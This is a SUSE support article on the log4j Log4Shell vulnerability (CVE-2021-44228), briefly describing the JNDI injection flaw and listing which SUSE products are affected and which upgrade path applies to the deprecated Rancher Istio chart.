Skip to content

Security vulnerability: log4j remote code execution aka log4shell CVE-2021-44228

Article Number: 000020526

Environment

All products

Situation

A 0-day exploit in the log4j Java logging framework was found by Chen Zhaojun of Alibaba Cloud Security Team, which allowed remote attackers able to inject strings into log4j based Java logging to execute code by
exploiting the default enabled JNDI bindings. This is possible without any preconditions, making it critical.

Resolution

SUSE considers log4j versions 2.0 and newer as affected, log4j 1.2.x does not have the same critical vulnerability and is not considered affected by this CVE.

SUSE Linux Enterprise products do not ship log4j 2.x.
SUSE Manager does not ship log4j 2.x.
SUSE Enterprise Storage does not ship log4j 2.x.
SUSE Openstack Cloud embeds log4j2 in the "storm" component, which will receive updates.
SUSE NeuVector product does not ship log4j 2.x.

SUSE Rancher is not affected by this vulnerability. The Helm chart for Istio 1.5, provided by Rancher and which is currently deprecated, includes Zipkin and is vulnerable to Log4j. Customers are advised to upgrade to the recent Istio version provided in Cluster Explorer, which does not uses Zipkin and is not affect to the vulnerability.

Please refer to the upstream guidance from log4j on fixing and mitigation measures if you deploy your Java Application stacks.